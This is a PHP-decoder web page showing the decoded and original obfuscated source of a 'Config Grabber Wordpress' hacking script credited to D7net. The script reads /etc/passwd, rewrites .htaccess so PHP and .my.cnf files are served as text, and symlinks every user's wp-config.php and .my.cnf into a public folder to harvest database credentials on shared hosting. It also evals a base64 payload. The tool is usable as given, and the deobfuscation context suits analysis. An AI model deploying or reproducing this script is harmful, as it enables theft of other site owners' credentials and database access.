Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto VVKFq; I7WQR: foreach ($uSr as $usrr) { $str = $ex("\72", $usrr); echo $str[0..

Decoded Output download

<?php 
 goto VVKFq; I7WQR: foreach ($uSr as $usrr) { $str = $ex(":", $usrr); echo $str[0] . "
"; } goto sUsRz; KueDb: $uSr = $fl("/et" . "c/pas" . "swd"); goto I7WQR; LirCc: $b4dec = "base64_decode"; goto NVW0g; v3cqL: if ($_POST["conf"]) { $folfig = $_POST["folfig"]; $type = $_POST["type"]; @$b($folfig, 493); @$c($folfig); $htaccess = "
Options Indexes FollowSymL" . "inks\xa\xaDirecto" . "ryIndex .my.cnf
\xaAddType txt .php
\xaAddType txt .my.cnf
\xaAddType txt .access" . "hash\xa\xaAddHandler txt .php
\xaAddHandler txt .cnf

AddHandler txt .accesshash\xa"; $fpc(".htac" . "cess", $htaccess, FILE_APPEND); $passwd = $ex("
", $_POST["pas" . "swd"]); foreach ($passwd as $pwd) { $user = trim($pwd); @$cr("/ho" . "me/" . $user . "/pu" . "bli" . "c_htm" . "l/w" . "p-c" . "onf" . "ig.p" . "hp", $user . "-Word" . "pr" . "ess1.t" . "xt"); @$cr("/ho" . "me/" . $user . "/public" . "_html/site/wp-config.php", $user . "-Wor" . "dpr" . "ess2.t" . "xt"); @$cr("/ho" . "me/" . $user . "/public_html/blog/wp-config.php", $user . "-Wor" . "dpr" . "ess3.t" . "xt"); @$cr("/ho" . "me/" . $user . "/public_html/wor" . "dpress/wp-config.php", $user . "-Wor" . "dpr" . "ess4.t" . "xt"); @$cr("/ho" . "me/" . $user . "/publi" . "c_html/web/wp-config.php", $user . "-Wor" . "dpr" . "ess5.t" . "xt"); @$cr("/ho" . "me/" . $user . "/public_html/wp/wp-config.php", $user . "-Wor" . "dpr" . "ess6.t" . "xt"); @$cr("/ho" . "me/" . $user . "/.m" . "y.c" . "nf", $user . "-cpa" . "nel.t" . "xt"); echo "<center>Done => <a href="d7netcfg/" target="_blank" class="button">Click Here</a></center>"; } echo "</body></html>"; } goto Fxh04; lazeI: $fl = "fi" . "le"; goto gm7QI; hxTuY: @$ni("disp" . "lay_err" . "ors", 0); goto puO5l; Wv9hm: $ni = "in" . "i_s" . "et"; goto u34Mt; u34Mt: $b = "mk" . "dir"; goto fONx1; puO5l: @$ni("fil" . "e_up" . "loads", 1); goto GsO_M; NVW0g: $d7netmode = "JG5ldG1vZGUgPSAwNDQ0OwokZmlsZXMxID0gJF9TRVJWRVJbJ1NDUklQVF9 GSUxFTkFNRSddOwpjaG1vZCgkZmlsZXMxLCRuZXRtb2RlKTs="; goto LPrYJ; K1dKl: echo "<html><title>$#@$@$@</title>\xa<style> body {
	background-color: darkslateblue;\xa}</style><body>"; goto Wv9hm; GsO_M: echo "<center><h2>Con" . "fig Gra" . "bber Wordpress</h2><h4>Created By D7net</h4><br><br><form meth" . "od="POST"><tex" . "tarea cols="100" name="pas" . "swd"  rows="25">"; goto KueDb; sUsRz: echo "</textarea><br><input type="hidden" class="input" name="folfig" value="d7netcfg" size=40/><br>\xa<input name="conf" size="80" class="ipt" value="GASS!" type="submit"><br>"; goto v3cqL; aJCUv: $fpc = "fil" . "e_" . "put_" . "con" . "tents"; goto eSF83; RVnE2: $ex = "exp" . "lode"; goto lazeI; eSF83: $cr = "sy" . "ml" . "ink"; goto RVnE2; LPrYJ: @eval($b4dec($d7netmode)); goto K1dKl; VVKFq: error_reporting(0); goto LirCc; gm7QI: @$ni("max_ex" . "ecution_t" . "ime", 0); goto hxTuY; fONx1: $c = "ch" . "dir"; goto aJCUv; Fxh04: ?> 

Did this file decode correctly?

Original Code

<?php
 goto VVKFq; I7WQR: foreach ($uSr as $usrr) { $str = $ex("\72", $usrr); echo $str[0] . "\12"; } goto sUsRz; KueDb: $uSr = $fl("\57\145\164" . "\143\57\x70\141\163" . "\x73\x77\144"); goto I7WQR; LirCc: $b4dec = "\x62\x61\x73\x65\66\64\137\144\145\143\x6f\x64\x65"; goto NVW0g; v3cqL: if ($_POST["\x63\157\x6e\x66"]) { $folfig = $_POST["\x66\157\154\146\151\147"]; $type = $_POST["\x74\171\160\x65"]; @$b($folfig, 493); @$c($folfig); $htaccess = "\12\x4f\160\x74\x69\x6f\x6e\x73\x20\x49\x6e\x64\x65\170\145\x73\x20\x46\157\x6c\x6c\x6f\167\x53\x79\155\114" . "\151\x6e\153\x73\xa\xa\104\151\x72\145\143\164\157" . "\162\x79\111\x6e\144\145\170\40\56\155\171\x2e\143\x6e\x66\12\xa\x41\x64\144\x54\x79\160\145\40\164\170\164\x20\56\x70\x68\x70\12\xa\101\x64\144\124\171\x70\x65\40\164\x78\x74\x20\56\x6d\x79\x2e\x63\x6e\146\12\xa\x41\x64\144\x54\171\x70\145\x20\x74\170\x74\x20\56\x61\143\143\145\163\x73" . "\150\141\163\x68\xa\xa\x41\x64\144\110\141\x6e\144\x6c\145\162\40\164\170\x74\40\x2e\160\150\160\12\xa\x41\144\x64\x48\141\156\144\154\x65\162\40\164\170\x74\x20\x2e\143\156\x66\12\12\x41\x64\x64\110\x61\156\144\154\x65\x72\x20\x74\170\x74\x20\x2e\x61\143\x63\x65\163\163\x68\x61\x73\x68\xa"; $fpc("\x2e\150\164\141\x63" . "\143\145\163\163", $htaccess, FILE_APPEND); $passwd = $ex("\12", $_POST["\x70\141\163" . "\163\167\144"]); foreach ($passwd as $pwd) { $user = trim($pwd); @$cr("\57\x68\x6f" . "\155\145\57" . $user . "\x2f\160\165" . "\x62\x6c\151" . "\143\x5f\150\x74\x6d" . "\154\x2f\x77" . "\x70\55\143" . "\x6f\x6e\x66" . "\x69\147\x2e\160" . "\150\160", $user . "\x2d\127\x6f\x72\144" . "\160\162" . "\x65\x73\x73\61\56\164" . "\170\164"); @$cr("\x2f\x68\157" . "\155\x65\57" . $user . "\x2f\x70\165\x62\154\x69\x63" . "\137\x68\x74\155\x6c\x2f\x73\151\164\145\x2f\x77\x70\55\x63\157\156\x66\151\147\x2e\160\150\160", $user . "\x2d\127\x6f\162" . "\144\160\x72" . "\145\163\163\62\56\x74" . "\x78\164"); @$cr("\x2f\150\x6f" . "\155\145\57" . $user . "\57\x70\x75\x62\154\151\x63\137\150\x74\155\154\x2f\142\154\157\147\57\x77\160\x2d\x63\x6f\x6e\146\x69\147\56\x70\150\x70", $user . "\x2d\127\157\x72" . "\144\x70\x72" . "\145\x73\163\x33\x2e\x74" . "\x78\164"); @$cr("\57\x68\157" . "\155\145\57" . $user . "\x2f\160\x75\142\154\x69\143\x5f\150\164\155\154\x2f\x77\x6f\162" . "\x64\x70\162\x65\163\x73\x2f\x77\160\55\143\157\156\146\x69\147\56\160\x68\160", $user . "\x2d\127\157\x72" . "\144\x70\x72" . "\x65\x73\x73\x34\x2e\x74" . "\x78\x74"); @$cr("\x2f\150\x6f" . "\x6d\145\57" . $user . "\x2f\x70\x75\x62\154\151" . "\x63\137\x68\164\x6d\x6c\x2f\x77\x65\x62\x2f\x77\x70\55\x63\x6f\x6e\146\x69\147\56\160\150\160", $user . "\55\127\x6f\162" . "\x64\160\x72" . "\145\163\x73\x35\x2e\x74" . "\x78\x74"); @$cr("\x2f\150\157" . "\155\145\57" . $user . "\x2f\x70\x75\142\x6c\151\x63\137\x68\x74\x6d\154\57\167\160\x2f\167\x70\55\143\157\156\x66\151\x67\x2e\160\x68\x70", $user . "\x2d\127\157\x72" . "\x64\x70\162" . "\145\x73\x73\66\x2e\164" . "\170\164"); @$cr("\x2f\x68\x6f" . "\x6d\145\x2f" . $user . "\x2f\x2e\x6d" . "\171\x2e\x63" . "\x6e\x66", $user . "\55\x63\160\x61" . "\156\x65\154\x2e\164" . "\x78\164"); echo "\74\x63\145\x6e\164\145\x72\76\x44\157\x6e\x65\40\75\x3e\40\74\141\40\x68\162\145\x66\x3d\42\x64\x37\x6e\145\x74\143\x66\x67\x2f\x22\x20\x74\x61\162\x67\x65\x74\75\42\137\x62\x6c\141\156\153\x22\40\x63\154\141\x73\x73\x3d\x22\142\165\164\164\x6f\x6e\x22\76\103\154\151\143\153\40\110\x65\x72\x65\74\57\141\x3e\x3c\x2f\x63\145\156\x74\x65\x72\76"; } echo "\x3c\57\x62\157\144\x79\76\74\57\150\x74\155\154\76"; } goto Fxh04; lazeI: $fl = "\x66\x69" . "\x6c\x65"; goto gm7QI; hxTuY: @$ni("\144\151\x73\160" . "\154\141\x79\137\145\162\162" . "\x6f\162\x73", 0); goto puO5l; Wv9hm: $ni = "\151\156" . "\x69\x5f\x73" . "\x65\x74"; goto u34Mt; u34Mt: $b = "\x6d\x6b" . "\144\151\x72"; goto fONx1; puO5l: @$ni("\146\151\154" . "\145\137\x75\160" . "\x6c\x6f\x61\144\x73", 1); goto GsO_M; NVW0g: $d7netmode = "\x4a\107\65\154\x64\x47\61\x76\x5a\107\125\x67\120\x53\x41\x77\116\104\121\x30\117\x77\157\x6b\132\x6d\x6c\163\132\130\115\170\111\x44\60\x67\x4a\106\x39\124\122\x56\112\127\122\126\x4a\142\112\61\116\104\x55\153\154\121\x56\106\x39\x20\x47\123\125\170\x46\x54\153\x46\x4e\x52\x53\144\x64\117\x77\160\x6a\141\x47\x31\166\x5a\103\x67\153\132\155\x6c\163\x5a\130\x4d\170\114\103\122\x75\132\130\122\164\142\62\122\x6c\x4b\124\163\x3d"; goto LPrYJ; K1dKl: echo "\x3c\150\x74\x6d\x6c\x3e\x3c\164\x69\x74\x6c\145\76\44\x23\x40\x24\100\x24\x40\74\57\x74\x69\x74\x6c\145\x3e\xa\74\163\164\171\154\145\x3e\x20\142\x6f\x64\171\x20\x7b\12\11\x62\x61\x63\x6b\147\162\157\x75\156\x64\x2d\x63\157\154\157\162\72\40\144\141\x72\x6b\x73\154\141\x74\x65\142\x6c\165\145\73\xa\x7d\x3c\x2f\163\164\171\154\x65\76\74\142\157\x64\171\76"; goto Wv9hm; GsO_M: echo "\74\143\x65\x6e\164\x65\x72\x3e\74\x68\x32\76\x43\x6f\156" . "\146\x69\147\40\107\x72\141" . "\142\x62\145\x72\x20\x57\x6f\162\144\160\x72\145\163\163\x3c\57\150\62\x3e\x3c\150\64\x3e\103\x72\145\x61\164\145\144\x20\102\171\40\x44\67\156\x65\x74\x3c\x2f\150\x34\x3e\74\142\162\76\74\x62\162\76\x3c\146\x6f\x72\x6d\x20\155\145\164\x68" . "\157\x64\75\x22\x50\117\123\124\42\76\x3c\x74\145\x78" . "\x74\x61\x72\x65\x61\40\x63\x6f\x6c\x73\x3d\x22\61\60\x30\x22\x20\x6e\141\x6d\145\x3d\42\160\141\x73" . "\x73\x77\144\42\x20\40\x72\157\x77\x73\x3d\42\62\65\42\x3e"; goto KueDb; sUsRz: echo "\74\57\164\x65\170\164\x61\x72\145\x61\x3e\x3c\142\162\x3e\x3c\151\156\x70\165\164\x20\164\171\x70\145\x3d\x22\150\151\144\x64\145\156\x22\x20\143\154\141\163\x73\75\42\151\x6e\160\x75\164\42\40\x6e\141\155\x65\x3d\x22\146\x6f\x6c\146\x69\147\42\40\166\x61\x6c\x75\x65\75\42\x64\67\156\145\164\x63\146\x67\42\x20\x73\151\172\145\x3d\x34\60\57\76\74\x62\162\x3e\xa\x3c\x69\156\160\165\x74\40\x6e\x61\x6d\145\75\x22\143\157\x6e\x66\42\x20\163\151\x7a\x65\75\42\x38\60\42\40\x63\154\141\163\x73\75\x22\151\x70\x74\42\40\166\141\x6c\x75\145\x3d\x22\107\101\123\x53\x21\42\x20\x74\x79\x70\x65\75\42\x73\x75\x62\155\x69\x74\x22\x3e\x3c\142\162\76"; goto v3cqL; aJCUv: $fpc = "\x66\x69\x6c" . "\145\137" . "\160\165\164\x5f" . "\x63\157\156" . "\x74\x65\156\x74\x73"; goto eSF83; RVnE2: $ex = "\x65\170\x70" . "\154\x6f\144\x65"; goto lazeI; eSF83: $cr = "\x73\171" . "\x6d\x6c" . "\151\x6e\x6b"; goto RVnE2; LPrYJ: @eval($b4dec($d7netmode)); goto K1dKl; VVKFq: error_reporting(0); goto LirCc; gm7QI: @$ni("\x6d\141\170\137\x65\170" . "\x65\143\x75\164\151\157\x6e\x5f\x74" . "\151\x6d\x65", 0); goto hxTuY; fONx1: $c = "\x63\x68" . "\144\x69\162"; goto aJCUv; Fxh04: ?>

Function Calls

None

Variables

None

Stats

MD5 bcb376c363c2a2269b737f02503b6851
Eval Count 0
Decode Time 57 ms